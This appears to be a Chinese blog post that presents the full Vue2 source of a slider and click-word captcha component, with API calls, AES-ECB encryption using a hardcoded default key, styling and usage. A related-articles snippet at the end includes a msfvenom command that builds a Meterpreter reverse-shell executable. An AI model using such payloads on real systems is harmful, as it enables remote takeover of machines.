滑块验证码

1.这里针对滑块验证给了一个封装的组件verifition,使用直接可以调用

2.组件目录

在这里插入图片描述

3.每个文件的内容

3.1 Api文件中只有一个index.js文件,用来存放获取滑块和校验滑块结果的api

import request from '@/router/axios'//获取验证图片
export function reqGet(data) {return request({url: '/code',method: 'get',data})
}//滑动或者点选验证
export function reqCheck(data) {return request({url: '/code/check',method: 'post',params: data})
}

3.2 utils文件夹中反了一些工具函数为校验提供支持,包含三个文件:ase.js、axios.js、util.js,不涉及任何组件的引用,可放心使用

//ase.js文件内容
//这里需要安装crypto-js进行加密
import CryptoJS from 'crypto-js'
/*** @word 要加密的内容* @keyWord String  服务器随机返回的关键字*  */
export function aesEncrypt(word,keyWord="XwKsGlMcdPMEhR1B"){var key = CryptoJS.enc.Utf8.parse(keyWord);var srcs = CryptoJS.enc.Utf8.parse(word);var encrypted = CryptoJS.AES.encrypt(srcs, key, {mode:CryptoJS.mode.ECB,padding: CryptoJS.pad.Pkcs7});return encrypted.toString();
}
//axios.js文件内容
import axios from 'axios';axios.defaults.baseURL = process.env.BASE_API;const service = axios.create({timeout: 40000,headers: {'X-Requested-With': 'XMLHttpRequest','Content-Type': 'application/json; charset=UTF-8'},
})
service.interceptors.request.use(config => {return config},error => {Promise.reject(error)}
)// response interceptor
service.interceptors.response.use(response => {const res = response.data;return res},error => {}
)
export default service
//util.js文件内容
export function resetSize(vm) {var img_width, img_height, bar_width, bar_height;	//图片的宽度、高度,移动条的宽度、高度var parentWidth = vm.$el.parentNode.offsetWidth || window.offsetWidthvar parentHeight = vm.$el.parentNode.offsetHeight || window.offsetHeightif (vm.imgSize.width.indexOf('%') != -1) {img_width = parseInt(this.imgSize.width) / 100 * parentWidth + 'px'} else {img_width = this.imgSize.width;}if (vm.imgSize.height.indexOf('%') != -1) {img_height = parseInt(this.imgSize.height) / 100 * parentHeight + 'px'} else {img_height = this.imgSize.height}if (vm.barSize.width.indexOf('%') != -1) {bar_width = parseInt(this.barSize.width) / 100 * parentWidth + 'px'} else {bar_width = this.barSize.width}if (vm.barSize.height.indexOf('%') != -1) {bar_height = parseInt(this.barSize.height) / 100 * parentHeight + 'px'} else {bar_height = this.barSize.height}return {imgWidth: img_width, imgHeight: img_height, barWidth: bar_width, barHeight: bar_height}
}export const _code_chars = [1, 2, 3, 4, 5, 6, 7, 8, 9, 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z']
export const _code_color1 = ['#fffff0', '#f0ffff', '#f0fff0', '#fff0f0']
export const _code_color2 = ['#FF0033', '#006699', '#993366', '#FF9900', '#66CC66', '#FF33CC']

3.3Verify文件夹中放的是关键的组件内容,包含两个文件:VerifyPoints.vue,VerifySlide.vue

//VerifyPoints.vue内容
<template><div style="position: relative"><div class="verify-img-out"><div class="verify-img-panel" :style="{width: setSize.imgWidth,height: setSize.imgHeight,'background-size': setSize.imgWidth + ' ' + setSize.imgHeight,'margin-bottom': vSpace + 'px',}"><div class="verify-refresh" style="z-index: 3" @click="refresh" v-show="showRefresh"><i class="iconfont icon-refresh"></i></div><img :src="'data:image/png;base64,' + pointBackImgBase" ref="canvas" altstyle="width: 100%; height: 100%; display: block" @click="bindingClick ? canvasClick($event) : undefined" /><div v-for="(tempPoint, index) in tempPoints" :key="index" class="point-area" :style="{'background-color': '#1abd6c',color: '#fff','z-index': 9999,width: '20px',height: '20px','text-align': 'center','line-height': '20px','border-radius': '50%',position: 'absolute',top: parseInt(tempPoint.y - 10) + 'px',left: parseInt(tempPoint.x - 10) + 'px',}">{{ index + 1 }}</div></div></div><!-- 'height': this.barSize.height, --><div class="verify-bar-area" :style="{width: setSize.imgWidth,color: this.barAreaColor,'border-color': this.barAreaBorderColor,'line-height': this.barSize.height,}"><span class="verify-msg">{{ text }}</span></div></div>
</template>
<script type="text/babel">
/*** VerifyPoints* @description 点选* */
import {resetSize,_code_chars,_code_color1,_code_color2,
} from "./../utils/util";
import { aesEncrypt } from "./../utils/ase";
import { reqGet, reqCheck } from "./../api/index";export default {name: "VerifyPoints",props: {//弹出式pop,固定fixedmode: {type: String,default: "fixed",},captchaType: {type: String,},//间隔vSpace: {type: Number,default: 5,},imgSize: {type: Object,default() {return {width: "310px",height: "155px",};},},barSize: {type: Object,default() {return {width: "310px",height: "40px",};},},},data() {return {secretKey: "", //后端返回的ase加密秘钥checkNum: 3, //默认需要点击的字数fontPos: [], //选中的坐标信息checkPosArr: [], //用户点击的坐标num: 1, //点击的记数pointBackImgBase: "", //后端获取到的背景图片poinTextList: [], //后端返回的点击字体顺序backToken: "", //后端返回的token值setSize: {imgHeight: 0,imgWidth: 0,barHeight: 0,barWidth: 0,},tempPoints: [],text: "",barAreaColor: undefined,barAreaBorderColor: undefined,showRefresh: true,bindingClick: true,};},computed: {resetSize() {return resetSize;},},methods: {init() {//加载页面this.fontPos.splice(0, this.fontPos.length);this.checkPosArr.splice(0, this.checkPosArr.length);this.num = 1;this.getPictrue();this.$nextTick(() => {this.setSize = this.resetSize(this); //重新设置宽度高度this.$parent.$emit("ready", this);});},canvasClick(e) {this.checkPosArr.push(this.getMousePos(this.$refs.canvas, e));if (this.num == this.checkNum) {this.num = this.createPoint(this.getMousePos(this.$refs.canvas, e));//按比例转换坐标值this.checkPosArr = this.pointTransfrom(this.checkPosArr, this.setSize);//等创建坐标执行完setTimeout(() => {// var flag = this.comparePos(this.fontPos, this.checkPosArr);//发送后端请求var captchaVerification = this.secretKey? aesEncrypt(this.backToken + "---" + JSON.stringify(this.checkPosArr),this.secretKey): this.backToken + "---" + JSON.stringify(this.checkPosArr);let data = {captchaType: this.captchaType,pointJson: this.secretKey? aesEncrypt(JSON.stringify(this.checkPosArr), this.secretKey): JSON.stringify(this.checkPosArr),token: this.backToken,};reqCheck(data).then((response) => {let res = response.data.data;if (res.repCode == "0000") {this.barAreaColor = "#4cae4c";this.barAreaBorderColor = "#5cb85c";this.text = "验证成功";this.bindingClick = false;if (this.mode == "pop") {setTimeout(() => {this.$parent.clickShow = false;this.refresh();}, 1500);}this.$parent.$emit("success", { captchaVerification });} else {this.$parent.$emit("error", this);this.barAreaColor = "#d9534f";this.barAreaBorderColor = "#d9534f";this.text = "验证失败";setTimeout(() => {this.refresh();}, 700);}});}, 400);}if (this.num < this.checkNum) {this.num = this.createPoint(this.getMousePos(this.$refs.canvas, e));}},//获取坐标getMousePos: function (obj, e) {var x = e.offsetX;var y = e.offsetY;return { x, y };},//创建坐标点createPoint: function (pos) {this.tempPoints.push(Object.assign({}, pos));return ++this.num;},refresh: function () {this.tempPoints.splice(0, this.tempPoints.length);this.barAreaColor = "#000";this.barAreaBorderColor = "#ddd";this.bindingClick = true;this.fontPos.splice(0, this.fontPos.length);this.checkPosArr.splice(0, this.checkPosArr.length);this.num = 1;this.getPictrue();this.text = "验证失败";this.showRefresh = true;},// 请求背景图片和验证图片getPictrue() {let data = {captchaType: this.captchaType,};reqGet(data).then((response) => {let res = response.data.data;if (res.repCode == "0000") {this.pointBackImgBase = res.repData.originalImageBase64;this.backToken = res.repData.token;this.secretKey = res.repData.secretKey;this.poinTextList = res.repData.wordList;this.text = "请依次点击【" + this.poinTextList.join(",") + "】";} else {this.text = res.repMsg;}});},//坐标转换函数pointTransfrom(pointArr, imgSize) {var newPointArr = pointArr.map((p) => {let x = Math.round((310 * p.x) / parseInt(imgSize.imgWidth));let y = Math.round((155 * p.y) / parseInt(imgSize.imgHeight));return { x, y };});// console.log(newPointArr,"newPointArr");return newPointArr;},},watch: {// type变化则全面刷新type: {immediate: true,handler() {this.init();},},},mounted() {// 禁止拖拽this.$el.onselectstart = function () {return false;};},
};
</script>
//VerifySlide.vue文件内容
<template><div style="position: relative"><div v-if="type === '2'" class="verify-img-out" :style="{ height: parseInt(setSize.imgHeight) + vSpace + 'px' }"><div class="verify-img-panel" :style="{ width: setSize.imgWidth, height: setSize.imgHeight }"><img :src="'data:image/png;base64,' + backImgBase" alt style="width: 100%; height: 100%; display: block" /><div class="verify-refresh" @click="refresh" v-show="showRefresh"><i class="iconfont icon-refresh"></i></div><transition name="tips"><span class="verify-tips" v-if="tipWords" :class="passFlag ? 'suc-bg' : 'err-bg'">{{ tipWords }}</span></transition></div></div><!-- 公共部分 --><div class="verify-bar-area" :style="{width: setSize.imgWidth,height: barSize.height,'line-height': barSize.height,}"><span class="verify-msg" v-text="text"></span><div class="verify-left-bar" :style="{width: leftBarWidth !== undefined ? leftBarWidth : barSize.height,height: barSize.height,'border-color': leftBarBorderColor,transaction: transitionWidth,}"><span class="verify-msg" v-text="finishText"></span><div class="verify-move-block" @touchstart="start" @mousedown="start" :style="{width: barSize.height,height: barSize.height,'background-color': moveBlockBackgroundColor,left: moveBlockLeft,transition: transitionLeft,}"><i :class="['verify-icon iconfont', iconClass]" :style="{ color: iconColor }"></i><div v-if="type === '2'" class="verify-sub-block" :style="{width: Math.floor((parseInt(setSize.imgWidth) * 47) / 310) + 'px',height: setSize.imgHeight,top: '-' + (parseInt(setSize.imgHeight) + vSpace) + 'px','background-size': setSize.imgWidth + ' ' + setSize.imgHeight,}"><img :src="'data:image/png;base64,' + blockBackImgBase" altstyle="width: 100%; height: 100%; display: block" /></div></div></div></div></div>
</template>
<script type="text/babel">
/*** VerifySlide* @description 滑块* */
import { aesEncrypt } from "./../utils/ase";
import { resetSize } from "./../utils/util";
import { reqGet, reqCheck } from "./../api/index";//  "captchaType":"blockPuzzle",
export default {name: "VerifySlide",props: {captchaType: {type: String,},type: {type: String,default: "1",},//弹出式pop,固定fixedmode: {type: String,default: "fixed",},vSpace: {type: Number,default: 5,},explain: {type: String,default: "向右滑动完成验证",},imgSize: {type: Object,default() {return {width: "310px",height: "155px",};},},blockSize: {type: Object,default() {return {width: "50px",height: "50px",};},},barSize: {type: Object,default() {return {width: "310px",height: "40px",};},},},data() {return {secretKey: "", //后端返回的加密秘钥 字段passFlag: "", //是否通过的标识backImgBase: "", //验证码背景图片blockBackImgBase: "", //验证滑块的背景图片backToken: "", //后端返回的唯一token值startMoveTime: "", //移动开始的时间endMovetime: "", //移动结束的时间tipsBackColor: "", //提示词的背景颜色tipWords: "",text: "",finishText: "",setSize: {imgHeight: 0,imgWidth: 0,barHeight: 0,barWidth: 0,},top: 0,left: 0,moveBlockLeft: undefined,leftBarWidth: undefined,// 移动中样式moveBlockBackgroundColor: undefined,leftBarBorderColor: "#ddd",iconColor: undefined,iconClass: "icon-right",status: false, //鼠标状态isEnd: false, //是够验证完成showRefresh: true,transitionLeft: "",transitionWidth: "",};},computed: {barArea() {return this.$el.querySelector(".verify-bar-area");},resetSize() {return resetSize;},},methods: {init() {this.text = this.explain;this.getPictrue();this.$nextTick(() => {let setSize = this.resetSize(this); //重新设置宽度高度for (let key in setSize) {this.$set(this.setSize, key, setSize[key]);}this.$parent.$emit("ready", this);});var _this = this;window.removeEventListener("touchmove", function (e) {_this.move(e);});window.removeEventListener("mousemove", function (e) {_this.move(e);});//鼠标松开window.removeEventListener("touchend", function () {_this.end();});window.removeEventListener("mouseup", function () {_this.end();});window.addEventListener("touchmove", function (e) {_this.move(e);});window.addEventListener("mousemove", function (e) {_this.move(e);});//鼠标松开window.addEventListener("touchend", function () {_this.end();});window.addEventListener("mouseup", function () {_this.end();});},//鼠标按下start: function (e) {e = e || window.event;if (!e.touches) {//兼容PC端var x = e.clientX;} else {//兼容移动端var x = e.touches[0].pageX;}this.startLeft = Math.floor(x - this.barArea.getBoundingClientRect().left);this.startMoveTime = +new Date(); //开始滑动的时间if (this.isEnd == false) {this.text = "";this.moveBlockBackgroundColor = "#337ab7";this.leftBarBorderColor = "#337AB7";this.iconColor = "#fff";e.stopPropagation();this.status = true;}},//鼠标移动move: function (e) {e = e || window.event;if (this.status && this.isEnd == false) {if (!e.touches) {//兼容PC端var x = e.clientX;} else {//兼容移动端var x = e.touches[0].pageX;}var bar_area_left = this.barArea.getBoundingClientRect().left;var move_block_left = x - bar_area_left; //小方块相对于父元素的left值if (move_block_left >=this.barArea.offsetWidth -parseInt(parseInt(this.blockSize.width) / 2) -2) {move_block_left =this.barArea.offsetWidth -parseInt(parseInt(this.blockSize.width) / 2) -2;}if (move_block_left <= 0) {move_block_left = parseInt(parseInt(this.blockSize.width) / 2);}//拖动后小方块的left值this.moveBlockLeft = move_block_left - this.startLeft + "px";this.leftBarWidth = move_block_left - this.startLeft + "px";}},//鼠标松开end: function () {this.endMovetime = +new Date();var _this = this;//判断是否重合if (this.status && this.isEnd == false) {var moveLeftDistance = parseInt((this.moveBlockLeft || "").replace("px", ""));moveLeftDistance =(moveLeftDistance * 310) / parseInt(this.setSize.imgWidth);let data = {captchaType: this.captchaType,pointJson: this.secretKey? aesEncrypt(JSON.stringify({ x: moveLeftDistance, y: 5.0 }),this.secretKey): JSON.stringify({ x: moveLeftDistance, y: 5.0 }),token: this.backToken,};reqCheck(data).then((response) => {let res = response.data.data;if (res.repCode == "0000") {this.moveBlockBackgroundColor = "#5cb85c";this.leftBarBorderColor = "#5cb85c";this.iconColor = "#fff";this.iconClass = "icon-check";this.showRefresh = false;this.isEnd = true;if (this.mode == "pop") {setTimeout(() => {this.$parent.clickShow = false;this.refresh();}, 1500);}this.passFlag = true;this.tipWords = `${((this.endMovetime - this.startMoveTime) /1000).toFixed(2)}s验证成功`;var captchaVerification = this.secretKey? aesEncrypt(this.backToken +"---" +JSON.stringify({ x: moveLeftDistance, y: 5.0 }),this.secretKey): this.backToken +"---" +JSON.stringify({ x: moveLeftDistance, y: 5.0 });setTimeout(() => {this.tipWords = "";this.$parent.closeBox();this.$parent.$emit("success", { captchaVerification });}, 1000);} else {this.moveBlockBackgroundColor = "#d9534f";this.leftBarBorderColor = "#d9534f";this.iconColor = "#fff";this.iconClass = "icon-close";this.passFlag = false;setTimeout(function () {_this.refresh();}, 1000);this.$parent.$emit("error", this);this.tipWords = "验证失败";setTimeout(() => {this.tipWords = "";}, 1000);}});this.status = false;}},refresh: function () {this.showRefresh = true;this.finishText = "";this.transitionLeft = "left .3s";this.moveBlockLeft = 0;this.leftBarWidth = undefined;this.transitionWidth = "width .3s";this.leftBarBorderColor = "#ddd";this.moveBlockBackgroundColor = "#fff";this.iconColor = "#000";this.iconClass = "icon-right";this.isEnd = false;this.getPictrue();setTimeout(() => {this.transitionWidth = "";this.transitionLeft = "";this.text = this.explain;}, 300);},// 请求背景图片和验证图片getPictrue() {let data = {captchaType: this.captchaType,};reqGet(data).then((response) => {let res = response.data.data;if (res.repCode == "0000") {this.backImgBase = res.repData.originalImageBase64;this.blockBackImgBase = res.repData.jigsawImageBase64;this.backToken = res.repData.token;this.secretKey = res.repData.secretKey;} else {this.tipWords = res.repMsg;}});},},watch: {// type变化则全面刷新type: {immediate: true,handler() {this.init();},},},mounted() {// 禁止拖拽this.$el.onselectstart = function () {return false;};},
};
</script>

3.4父组件内容,使用时调用show方法即可

<template><div :class="mode == 'pop' ? 'mask' : ''" v-show="showBox"><div :class="mode == 'pop' ? 'verifybox' : ''" :style="{ 'max-width': parseInt(imgSize.width) + 30 + 'px' }"><div class="verifybox-top" v-if="mode == 'pop'">请完成安全验证<span class="verifybox-close" @click="closeBox"><i class="iconfont icon-close"></i></span></div><div class="verifybox-bottom" :style="{ padding: mode == 'pop' ? '15px' : '0' }"><!-- 验证码容器 --><components v-if="componentType" :is="componentType" :captchaType="captchaType" :type="verifyType":figure="figure" :arith="arith" :mode="mode" :vSpace="vSpace" :explain="explain" :imgSize="imgSize":blockSize="blockSize" :barSize="barSize" ref="instance"></components></div></div></div>
</template>
<script type="text/babel">
/*** Verify 验证码组件* @description 分发验证码使用* */
import VerifySlide from "./Verify/VerifySlide";
import VerifyPoints from "./Verify/VerifyPoints";export default {name: "Vue2Verify",props: {// 双语化locale: {require: false,type: String,default() {// 默认语言不输入为浏览器语言if (navigator.language) {var language = navigator.language;} else {var language = navigator.browserLanguage;}return language;},},captchaType: {type: String,required: true,},figure: {type: Number,},arith: {type: Number,},mode: {type: String,default: "pop",},vSpace: {type: Number,},explain: {type: String,},imgSize: {type: Object,default() {return {width: "310px",height: "155px",};},},blockSize: {type: Object,},barSize: {type: Object,},},data() {return {// showBox:true,clickShow: false,// 内部类型verifyType: undefined,// 所用组件类型componentType: undefined,};},methods: {/*** i18n* @description 兼容vue-i18n 调用$t来转换ok* @param {String} text-被转换的目标* @return {String} i18n的结果* */i18n(text) {if (this.$t) {return this.$t(text);} else {// 兼容不存在的语言let i18n =this.$options.i18n.messages[this.locale] ||this.$options.i18n.messages["en-US"];return i18n[text];}},/*** refresh* @description 刷新* */refresh() {if (this.instance.refresh) {this.instance.refresh();}},closeBox() {this.clickShow = false;this.refresh();},show() {if (this.mode == "pop") {this.clickShow = true;}},},computed: {instance() {return this.$refs.instance || {};},showBox() {if (this.mode == "pop") {return this.clickShow;} else {return true;}},},watch: {captchaType: {immediate: true,handler(captchaType) {switch (captchaType.toString()) {case "blockPuzzle":this.verifyType = "2";this.componentType = "VerifySlide";break;case "clickWord":this.verifyType = "";this.componentType = "VerifyPoints";break;}},},},components: {VerifySlide,VerifyPoints,},
};
</script>
<style>
.verifybox {position: relative;box-sizing: border-box;border-radius: 18px;border: 1px solid #e4e7eb;background-color: #fff;box-shadow: 0 0 10px rgba(0, 0, 0, 0.3);left: 50%;top: 30%;transform: translate(-50%, -60%);
}.verifybox-top {padding: 0 15px;height: 50px;line-height: 50px;text-align: left;font-size: 16px;color: #45494c;border-bottom: 1px solid #e4e7eb;box-sizing: border-box;
}.verifybox-bottom {padding: 15px;box-sizing: border-box;
}.verifybox-close {position: absolute;top: 13px;right: 9px;width: 24px;height: 24px;text-align: center;cursor: pointer;
}.mask {position: fixed;top: 0;left: 0;z-index: 1001;width: 100%;height: 100vh;/* display: none; */transition: all 0.5s;
}.verify-tips {position: absolute;left: 0px;bottom: 0px;width: 100%;height: 30px;line-height: 30px;color: #fff;
}.suc-bg {background-color: rgba(92, 184, 92, 0.5);filter: progid:DXImageTransform.Microsoft.gradient(startcolorstr=#7f5CB85C, endcolorstr=#7f5CB85C);
}.err-bg {background-color: rgba(217, 83, 79, 0.5);filter: progid:DXImageTransform.Microsoft.gradient(startcolorstr=#7fD9534F, endcolorstr=#7fD9534F);
}.tips-enter,
.tips-leave-to {bottom: -30px;
}.tips-enter-active,
.tips-leave-active {transition: bottom 0.5s;
}/* ---------------------------- */
/*常规验证码*/
.verify-code {font-size: 20px;text-align: center;cursor: pointer;margin-bottom: 5px;border: 1px solid #ddd;
}.cerify-code-panel {height: 100%;overflow: hidden;
}.verify-code-area {float: left;
}.verify-input-area {float: left;width: 60%;padding-right: 10px;
}.verify-change-area {line-height: 30px;float: left;
}.varify-input-code {display: inline-block;width: 100%;height: 25px;
}.verify-change-code {color: #337ab7;cursor: pointer;
}.verify-btn {width: 200px;height: 30px;background-color: #337ab7;color: #ffffff;border: none;margin-top: 10px;
}/*滑动验证码*/
.verify-bar-area {position: relative;background: #ffffff;text-align: center;-webkit-box-sizing: content-box;-moz-box-sizing: content-box;box-sizing: content-box;border: 1px solid #ddd;-webkit-border-radius: 4px;
}.verify-bar-area .verify-move-block {position: absolute;top: 0px;left: 0;background: #fff;cursor: pointer;-webkit-box-sizing: content-box;-moz-box-sizing: content-box;box-sizing: content-box;box-shadow: 0 0 2px #888888;-webkit-border-radius: 1px;
}.verify-bar-area .verify-move-block:hover {background-color: #337ab7;color: #ffffff;
}.verify-bar-area .verify-left-bar {position: absolute;top: -1px;left: -1px;background: #f0fff0;cursor: pointer;-webkit-box-sizing: content-box;-moz-box-sizing: content-box;box-sizing: content-box;border: 1px solid #ddd;
}.verify-img-panel {margin: 0;-webkit-box-sizing: content-box;-moz-box-sizing: content-box;box-sizing: content-box;border-top: 1px solid #ddd;border-bottom: 1px solid #ddd;border-radius: 3px;position: relative;
}.verify-img-panel .verify-refresh {width: 25px;height: 25px;text-align: center;padding: 5px;cursor: pointer;position: absolute;top: 0;right: 0;z-index: 2;
}.verify-img-panel .icon-refresh {font-size: 20px;color: #fff;
}.verify-img-panel .verify-gap {background-color: #fff;position: relative;z-index: 2;border: 1px solid #fff;
}.verify-bar-area .verify-move-block .verify-sub-block {position: absolute;text-align: center;z-index: 3;/* border: 1px solid #fff; */
}.verify-bar-area .verify-move-block .verify-icon {font-size: 18px;
}.verify-bar-area .verify-msg {z-index: 3;
}/*字体图标的css*/
/*@font-face {font-family: "iconfont";*/
/*src: url('../fonts/iconfont.eot?t=1508229193188'); !* IE9*!*/
/*src: url('../fonts/iconfont.eot?t=1508229193188#iefix') format('embedded-opentype'), !* IE6-IE8 *!*/
/*url('data:application/x-font-woff;charset=utf-8;base64,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') format('woff'),*/
/*url('../fonts/iconfont.ttf?t=1508229193188') format('truetype'), !* chrome, firefox, opera, Safari, Android, iOS 4.2+*!*/
/*url('../fonts/iconfont.svg?t=1508229193188#iconfont') format('svg'); !* iOS 4.1- *!*/
/*}*/.iconfont {font-family: "iconfont" !important;font-size: 16px;font-style: normal;-webkit-font-smoothing: antialiased;-moz-osx-font-smoothing: grayscale;
}.icon-check:before {content: " ";display: block;width: 16px;height: 16px;position: absolute;margin: auto;left: 0;right: 0;top: 0;bottom: 0;z-index: 9999;background-image: url("");background-size: contain;
}.icon-close:before {content: " ";display: block;width: 16px;height: 16px;position: absolute;margin: auto;left: 0;right: 0;top: 0;bottom: 0;z-index: 9999;background-image: url("");background-size: contain;
}.icon-right:before {content: " ";display: block;width: 16px;height: 16px;position: absolute;margin: auto;left: 0;right: 0;top: 0;bottom: 0;background-size: cover;z-index: 9999;background-image: url("");background-size: contain;
}.icon-refresh:before {content: " ";display: block;width: 16px;height: 16px;position: absolute;margin: auto;left: 0;right: 0;top: 0;bottom: 0;z-index: 9999;background-image: url("");background-size: contain;
}
</style>

4.组件的使用

  <Verify @success="verifySuccess" :mode="'pop'" :captchaType="'blockPuzzle'":imgSize="{ width: '330px', height: '155px' }" ref="verify" />//使用时
this.$refs.verify.show() //展示滑块验证组件
//滑块验证成功后调取verifySuccess事件
verifySuccess(paramas){//其中 params.captchaVerification和登陆信息一起传给后端实现滑块验证完成
}

在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/544394.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

Spark-Transformation以及Action开发实战

文章目录 创建RDDTransformation以及ActionTransformation开发Action开发RDD持久化共享变量创建RDD RDD是Spark的编程核心,在进行Spark编程是,首要任务就是创建一个初始的RDDSpark提供三种创建RDD方式:集合、本地文件、HDFS文件 集合:主要用于本地测试,在实际部署到集群运…

MySQL--深入理解MVCC机制原理

什么是MVCC&#xff1f; MVCC全称 Multi-Version Concurrency Control&#xff0c;即多版本并发控制&#xff0c;维持一个数据的多个版本&#xff0c;主要是为了提升数据库的并发访问性能&#xff0c;用更高性能的方式去处理数据库读写冲突问题&#xff0c;实现无锁并发。 什…

R语言深度学习-5-深度前馈神经网络

本教程参考《RDeepLearningEssential》 本篇我们将学习如何建立并训练深度预测模型。我们将关注深度前馈神经网络 5.1 深度前馈神经网络 我们还是使用之前提到的H2O包&#xff0c;详细可以见之前的博客&#xff1a;R语言深度学习-1-深度学习入门&#xff08;H2O包安装报错解决…

从阿里云降价,看中国云计算创新之变

继“疯狂星期四”历史级大降价后&#xff0c;阿里云“AI驱动、公共云优先”的战略布局再落一子。 近日&#xff0c;阿里云与菜鸟、高德地图、中远海运、东航物流、圆通速递、申通快递、中通快递、德邦快递、G7易流、地上铁、浙江大学智能交通研究所等共同发起成立“物流智能联…

cool 中的Midway ----node.js的TypeORM的使用

1.介绍 TypeORM | Midway TypeORM 是 node.js 现有社区最成熟的对象关系映射器&#xff08;ORM &#xff09;。本文介绍如何在 Midway 中使用 TypeORM 相关信息&#xff1a; 描述可用于标准项目✅可用于 Serverless✅可用于一体化✅包含独立主框架❌包含独立日志❌ 和老写…

计算机网络-概述

文章目录 1.2 因特网概述1.2.1 网络、互连网&#xff08;互联网&#xff09;和因特网1.2.2 因特网发展的三个阶段1.2.4 因特网的组成 1.3 三种交换方式1.3.1 电路交换1.3.2 分组交换1.3.3 报文交换1.3.4 三种方式对比 1.4 计算机网络的定义1.5 计算机网络的性能指标1.5.1 速率1…

渗透测试框架权限维持技术——Persistence模块

测试环境&#xff1a; kali win7 测试步骤&#xff1a; 1.利用MSF编写远控程序 msfvenom -p windows/meterpreter/reverse_tcp lhost10.0.0.163 lport55555 -f exe -o 5555.exe-p 漏洞利用payload lhost 监听地址&#xff08;kali地址&#xff09; lport 监听端口&#xf…

uniapp——第2篇:编写vue语法

前提&#xff0c;建议先学会前端几大基础&#xff1a;HTML、CSS、JS、Ajax&#xff0c;还有一定要会Vue!&#xff08;Vue2\Vue3&#xff09;都要会&#xff01;&#xff01;&#xff01;不然不好懂 一、去哪写&#xff1f; 就在【pages】的你的人一个页面文件夹里的【.vue】文…

Vue2在一个页面内动态切换菜单显示对应的路由组件

